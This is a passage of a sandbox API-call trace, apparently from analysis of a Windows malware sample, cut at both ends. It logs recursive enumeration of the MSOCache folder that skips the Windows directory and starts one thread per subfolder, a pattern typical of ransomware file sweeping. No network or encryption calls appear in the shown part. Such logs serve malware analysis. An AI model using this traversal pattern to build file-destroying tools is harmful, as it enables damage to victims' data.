hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 24 os_tid = 0xa94 [0039.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*.*", lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53f0 [0039.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.012] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.014] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.015] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0039.015] lstrcmpW (lpString1=".", lpString2="{90140000-0016-0409-1000-0000000FF1CE}-C") returned -1 [0039.015] lstrcmpW (lpString1="..", lpString2="{90140000-0016-0409-1000-0000000FF1CE}-C") returned -1 [0039.015] lstrcmpiW (lpString1="windows", lpString2="{90140000-0016-0409-1000-0000000FF1CE}-C") returned 1 [0039.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.015] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.015] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0016-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C" [0039.015] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" [0039.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33680b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.019] CloseHandle (hObject=0x1c4) returned 1 [0039.019] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0039.020] lstrcmpW (lpString1=".", lpString2="{90140000-0018-0409-1000-0000000FF1CE}-C") returned -1 [0039.020] lstrcmpW (lpString1="..", lpString2="{90140000-0018-0409-1000-0000000FF1CE}-C") returned -1 [0039.020] lstrcmpiW (lpString1="windows", lpString2="{90140000-0018-0409-1000-0000000FF1CE}-C") returned 1 [0039.020] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.020] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0018-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" [0039.020] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0039.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ebdc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.024] CloseHandle (hObject=0x1c4) returned 1 [0039.024] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0039.024] lstrcmpW (lpString1=".", lpString2="{90140000-0019-0409-1000-0000000FF1CE}-C") returned -1 [0039.024] lstrcmpW (lpString1="..", lpString2="{90140000-0019-0409-1000-0000000FF1CE}-C") returned -1 [0039.024] lstrcmpiW (lpString1="windows", lpString2="{90140000-0019-0409-1000-0000000FF1CE}-C") returned 1 [0039.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.025] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.025] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0019-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" [0039.025] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" [0039.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x61be90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.042] CloseHandle (hObject=0x1c4) returned 1 [0039.042] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0039.042] lstrcmpW (lpString1=".", lpString2="{90140000-001A-0409-1000-0000000FF1CE}-C") returned -1 [0039.042] lstrcmpW (lpString1="..", lpString2="{90140000-001A-0409-1000-0000000FF1CE}-C") returned -1 [0039.042] lstrcmpiW (lpString1="windows", lpString2="{90140000-001A-0409-1000-0000000FF1CE}-C") returned 1 [0039.043] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.043] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-001A-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" [0039.043] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" [0039.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9448590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.050] CloseHandle (hObject=0x1c4) returned 1 [0039.050] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0039.050] lstrcmpW (lpString1=".", lpString2="{90140000-001B-0409-1000-0000000FF1CE}-C") returned -1 [0039.050] lstrcmpW (lpString1="..", lpString2="{90140000-001B-0409-1000-0000000FF1CE}-C") returned -1 [0039.050] lstrcmpiW (lpString1="windows", lpString2="{90140000-001B-0409-1000-0000000FF1CE}-C") returned 1 [0039.052] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.052] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.052] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-001B-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" [0039.052] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0039.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94605f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.059] CloseHandle (hObject=0x1c4) returned 1 [0039.059] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0039.059] lstrcmpW (lpString1=".", lpString2="{90140000-002C-0409-1000-0000000FF1CE}-C") returned -1 [0039.059] lstrcmpW (lpString1="..", lpString2="{90140000-002C-0409-1000-0000000FF1CE}-C") returned -1 [0039.059] lstrcmpiW (lpString1="windows", lpString2="{90140000-002C-0409-1000-0000000FF1CE}-C") returned 1 [0039.059] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.059] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.059] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-002C-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" [0039.059] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0039.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x64bf60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.067] CloseHandle (hObject=0x1c4) returned 1 [0039.067] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0039.067] lstrcmpW (lpString1=".", lpString2="{90140000-0043-0409-1000-0000000FF1CE}-C") returned -1 [0039.067] lstrcmpW (lpString1="..", lpString2="{90140000-0043-0409-1000-0000000FF1CE}-C") returned -1 [0039.067] lstrcmpiW (lpString1="windows", lpString2="{90140000-0043-0409-1000-0000000FF1CE}-C") returned 1 [0039.068] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.068] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.069] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0043-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" [0039.069] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0039.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94c0798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.086] CloseHandle (hObject=0x1c4) returned 1 [0039.086] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0039.086] lstrcmpW (lpString1=".", lpString2="{90140000-0044-0409-1000-0000000FF1CE}-C") returned -1 [0039.086] lstrcmpW (lpString1="..", lpString2="{90140000-0044-0409-1000-0000000FF1CE}-C") returned -1 [0039.086] lstrcmpiW (lpString1="windows", lpString2="{90140000-0044-0409-1000-0000000FF1CE}-C") returned 1 [0039.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.086] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.086] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0044-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" [0039.086] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" [0039.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4100118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.098] CloseHandle (hObject=0x1c4) returned 1 [0039.098] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0039.098] lstrcmpW (lpString1=".", lpString2="{90140000-0054-0409-1000-0000000FF1CE}-C") returned -1 [0039.099] lstrcmpW (lpString1="..", lpString2="{90140000-0054-0409-1000-0000000FF1CE}-C") returned -1 [0039.099] lstrcmpiW (lpString1="windows", lpString2="{90140000-0054-0409-1000-0000000FF1CE}-C") returned 1 [0039.100] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.100] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.100] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0054-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" [0039.100] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" [0039.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95088d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.106] CloseHandle (hObject=0x1c4) returned 1 [0039.106] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0039.106] lstrcmpW (lpString1=".", lpString2="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned -1 [0039.106] lstrcmpW (lpString1="..", lpString2="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned -1 [0039.106] lstrcmpiW (lpString1="windows", lpString2="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 1 [0039.108] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.108] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.108] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-00A1-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" [0039.108] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*.*" [0039.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9520938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.121] CloseHandle (hObject=0x1c4) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0039.121] lstrcmpW (lpString1=".", lpString2="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned -1 [0039.121] lstrcmpW (lpString1="..", lpString2="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned -1 [0039.121] lstrcmpiW (lpString1="windows", lpString2="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 1 [0039.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.122] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.122] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-00B4-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" [0039.122] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" [0039.123] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9568a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.139] CloseHandle (hObject=0x1c4) returned 1 [0039.139] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0039.139] lstrcmpW (lpString1=".", lpString2="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned -1 [0039.139] lstrcmpW (lpString1="..", lpString2="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned -1 [0039.139] lstrcmpiW (lpString1="windows", lpString2="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 1 [0039.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.141] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.141] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-00BA-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All 